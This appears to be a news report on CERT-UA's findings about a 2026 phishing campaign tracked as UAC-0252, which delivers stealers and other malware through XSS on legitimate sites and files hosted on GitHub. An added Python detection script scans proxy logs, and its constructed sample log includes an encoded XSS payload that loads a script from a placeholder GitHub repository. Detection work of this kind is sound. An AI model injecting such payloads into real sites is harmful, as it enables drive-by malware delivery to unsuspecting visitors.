CERT-UA said it has observed multiple cases of phishing emails starting in January 2026, allegedly sent on behalf of central executive authorities and regional administrations. The messages urge recipients to urgently update mobile applications used in widely deployed civilian and military systems.
According to the Ukrainian cybersecurity agency, the emails may contain an attachment in the form of an archive with an EXE file or a link to a legitimate but XSS-vulnerable website. Visiting such a site triggers the execution of malicious JavaScript code, which subsequently downloads an executable file onto the victim’s computer. The EXE files and scripts are hosted on the legitimate service GitHub.
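The delivery chain described above (a legitimate but XSS-vulnerable site injects script that pulls an executable from GitHub) leaves a recognisable pattern in web-proxy logs. The following Python script is an added example, not CERT-UA's tooling or anything taken from the report: it flags two things in constructed proxy log lines, requests whose query string carries script-like content, and downloads of executables or scripts from GitHub-hosted storage when the referring page is not itself on GitHub. The log format, the hostname legit-site.example and the repository paths are assumptions made for illustration.

```python
"""Added detection example: heuristic scan of web-proxy log lines for the
"XSS on a legitimate site -> script -> executable fetched from GitHub" chain.
The log format and all sample lines below are constructed for illustration;
this is not CERT-UA's code."""
import re
from urllib.parse import urlparse, unquote

# Public GitHub hosts that serve raw files and release assets.
GITHUB_HOSTS = {
    "github.com",
    "raw.githubusercontent.com",
    "objects.githubusercontent.com",
    "codeload.github.com",
}
# File extensions that should rarely be pulled from GitHub by a browser
# that is sitting on an unrelated third-party page.
EXECUTABLE_EXT = re.compile(r"\.(exe|scr|msi|bat|cmd|ps1|vbs|js|hta)$", re.IGNORECASE)
# Crude marker for script content arriving via a reflected query parameter.
XSS_MARKER = re.compile(r"<\s*script|javascript:|onerror\s*=|document\.write", re.IGNORECASE)


def parse_line(line):
    """Assumed log format: <ts> <client> <method> <url> <status> <referer>."""
    parts = line.split()
    if len(parts) < 6:
        return None
    ts, client, method, url, status, referer = parts[:6]
    return {"ts": ts, "client": client, "method": method,
            "url": url, "status": status, "referer": referer}


def is_github(host):
    return host in GITHUB_HOSTS


def classify(rec):
    """Return a list of finding tags for one parsed record (empty if benign)."""
    findings = []
    u = urlparse(rec["url"])
    host = u.hostname or ""
    if is_github(host) and EXECUTABLE_EXT.search(u.path):
        ref_host = urlparse(rec["referer"]).hostname or ""
        if rec["referer"] == "-":
            findings.append("gh-executable-no-referer")
        elif not is_github(ref_host):
            # Browser on a non-GitHub page pulled a binary/script from GitHub.
            findings.append("gh-executable-third-party-referer")
    # Decode percent-encoding before looking for script markers in the query.
    if XSS_MARKER.search(unquote(u.query)):
        findings.append("xss-like-query")
    return findings


def scan(lines):
    """Scan log lines; return (client, url, findings) for every hit, in order."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            alerts.append((rec["client"], rec["url"], tags))
    return alerts


# Constructed sample log: three steps of the chain plus two benign GitHub hits.
SAMPLE_LOG = [
    "2026-01-15T09:12:03Z 10.0.0.21 GET https://legit-site.example/search?q=%3Cscript%20src%3D%22https://raw.githubusercontent.com/user/repo/main/u.js%22%3E%3C/script%3E 200 -",
    "2026-01-15T09:12:04Z 10.0.0.21 GET https://raw.githubusercontent.com/user/repo/main/u.js 200 https://legit-site.example/search?q=x",
    "2026-01-15T09:12:05Z 10.0.0.21 GET https://github.com/user/repo/releases/download/v1/update.exe 302 https://legit-site.example/search?q=x",
    "2026-01-15T09:13:00Z 10.0.0.22 GET https://github.com/user/repo 200 https://github.com/",
    "2026-01-15T09:14:00Z 10.0.0.23 GET https://raw.githubusercontent.com/user/repo/main/README.md 200 https://github.com/user/repo",
]

if __name__ == "__main__":
    for client, url, tags in scan(SAMPLE_LOG):
        print(client, url, ",".join(tags))
```

The referer check is the useful part: developers and CI systems fetch scripts and installers from GitHub all the time, but they do so from GitHub pages or with no browser referer at all, whereas the chain above produces a GitHub download whose referer is an unrelated site. Treat the query-string marker as a low-confidence signal on its own and correlate it with the download from the same client within a short window.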
During January–February 2026, CERT-UA observed several malware tools, including SHADOWSNIFF (a stealer distributed via GitHub), SALATSTEALER (a malware-as-a-service stealer), and DEAFTICK (a primitive backdoor written in Go).
While analyzing one of the GitHub repositories, researchers also identified a program exhibiting characteristics of ransomware under the internal name “AVANGARD ULTIMATE v6.0,” as well as an archive containing an exploit for a WinRAR vulnerability (CVE-2025-8088). Last August, cybersecurity firm ESET reported that this flaw was exploited in the wild by the Russia-aligned group RomCom.
Based on a detailed analysis of the infrastructure, tooling, and publicly available information, CERT-UA has linked the activity to the Telegram channel “PalachPro.” The activity is being tracked under the identifier UAC-0252.